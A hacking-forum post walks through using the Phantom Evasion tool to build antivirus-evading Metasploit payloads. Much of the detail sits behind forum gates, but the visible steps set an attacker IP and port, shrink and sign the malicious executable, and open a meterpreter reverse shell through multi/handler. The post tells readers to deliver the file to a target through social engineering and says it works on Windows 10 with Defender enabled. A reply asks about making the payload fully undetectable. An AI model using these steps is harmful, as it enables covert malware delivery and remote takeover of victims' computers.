Jump to content
Report any bug Read more... ×
We're hiring! We are accepting applications for Developers, Teachers, Redactors and Junior Moderators. Read more... ×

Create an account on our board

or login and enjoy all the possibilities

Existing user? Sign In

Sign In



Sign Up

Learn Or Teach

You can learn computer security by practicing in the Dashboard, you can also be taught by a teacher. Or You can teach community members regardless of your specialty, and earn points for each person!

Learn or Teach

The Challenges

The new Challenges page is here. Take advantage of several vulnerable web applications to help train you such as, DVWA, XVWA, Mutillidae. You can also launch an existing or custom virtual machine.

Play Now !

Collaboration Room

The first categories of the forum are rooms that you can create or join in order to participate in events with the other members of the community. You can also create your room to make a teaching request, or attend your teacher's presentation. In this room you can create a private forum, store your information, invite other people etc.

Create Room

Create your club

You can create a club with your friends, earn points in teams. Creating a club gives you access to a team space. There you will have a private forum where you can store files, share information etc. Invite your friends and play together!

Create yours now!

VIP

Several VIP packs are available, understand that the survival of this site depends on it. Of course you can buy this pack with your points won during events. Formulas: Vip Member Vip Teacher Vip student

Buy
News
  • For new users read this
  • Challenges
  • for new users thank you to post in introduction and answer "Accept" on the topic of the rules to have access to the integrity of the forum and receive your Exploit-Code
  • The challenges board is being developed you are likely to encounter some bugs if this is the case report to an administrator.
Sign in to follow this  
AdminSec

BYPASS ANTIVIRUS DETECTION WITH PHANTOM PAYLOADS

Recommended Posts

Metasploit is the most popular tool used in pentesting. Metasploit tries to find weakness across your local network before an attacker does. This is the most common tool used by attacker’s to test security of operating system. In Kali Linux metasploit comes pre-installed with lots of payloads which are used to generate malicious executable’s to hack different platforms. But today we will show you a tool called Phantom Evasion which is used to generate FUD (Fully Undetectable) executable’s with msfvenom payload. According to developer Phantom Evasion main aim is to bypass antivirus detection or we can say Antivirus Evasion.

Phantom Evasion has been tested on Kali Linux 2018.4 amd64).
For cloning type git clone

Hidden Content

    Give reaction or reply to this topic to see the hidden content.

Type cd Phantom-Evasion
Type chmod u+x phantom-evasion.py
Type python3 phantom-evasion.py
When running first time it may encounter some error but the tool will work perfectly.

Hidden Content

    Give reaction or reply to this topic to see the hidden content.

Hidden Content

    Give reaction or reply to this topic to see the hidden content.

Type 1

Hidden Content

    Give reaction or reply to this topic to see the hidden content.

 

    Hidden Content

      Give reaction or reply to this topic to see the hidden content.

    Type 2

    Hidden Content

      Give reaction or reply to this topic to see the hidden content.

    After selecting any payload it will display description of the payload & on what extension the payload will build.

    Hidden Content

      Give reaction or reply to this topic to see the hidden content.

    Type 192.168.1.6 (Listen/ Attacker’s IP address)

    Hidden Content

      Give reaction or reply to this topic to see the hidden content.

    Type 443 (Listen/ Attacker’s Port)

    Hidden Content

      Give reaction or reply to this topic to see the hidden content.

    Then enter filename : file

    Hidden Content

      Give reaction or reply to this topic to see the hidden content.

    Type n to create only single process in target computer. So it become less chance to get caught by the antivirus.

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      Type Y

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      The above query will minimize the malicious file size.
      Type y

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      Above query will sign the malicious file with default certificate comes with phantom evasion.
      You can use your own certificate or use it with Microsoft certificate which comes with phantom evasion.
      Type y
      Type 1

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      Type 1

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      After creating malicious code send the file to target. You can use any social engineering to trick your target.

      TESTING WINDOWS PLATFORM :-

      For testing we are using Windows 7 (32 Bit) with Windows Defender Disabled.
      Open the executable file using by pressing enter.
      For checking the payload. You can use metasploit multi handler which comes pre-installed in Kali Linux. Open another terminal & type msfconsole.
      Type use multi/handler

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      Type LHOST 192.168.1.6 (same as you entered in phantom evasion).
      Type LPORT 443 (same as you entered in phantom evasion).
      Type show options

      Hidden Content

        Give reaction or reply to this topic to see the hidden content.

      Type run

        Hidden Content

          Give reaction or reply to this topic to see the hidden content.

        As malicious is already started in Windows 7 Professional 32 Bit. After typing run a new session will be created between attacker & target machines.
        Typesysinfo to check the target computer details.

        Hidden Content

          Give reaction or reply to this topic to see the hidden content.

        Now you can manipulate the target using meterpreter command shell.
        Now for further testing we have used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled.
        Open the malicious exe in Windows 10 machine. As you open the exe a new session will be created in multi/ handler.
        Type sysinfo to check the target computer details.

        Hidden Content

          Give reaction or reply to this topic to see the hidden content.

        Now you can manipulate the target using meterpreter command shell.

        • Like 1

        Share this post


        Link to post
        Share on other sites

        I can use the latest technology to make the perfect kill-free effect.?

        Share this post


        Link to post
        Share on other sites
        Sign in to follow this  

        ×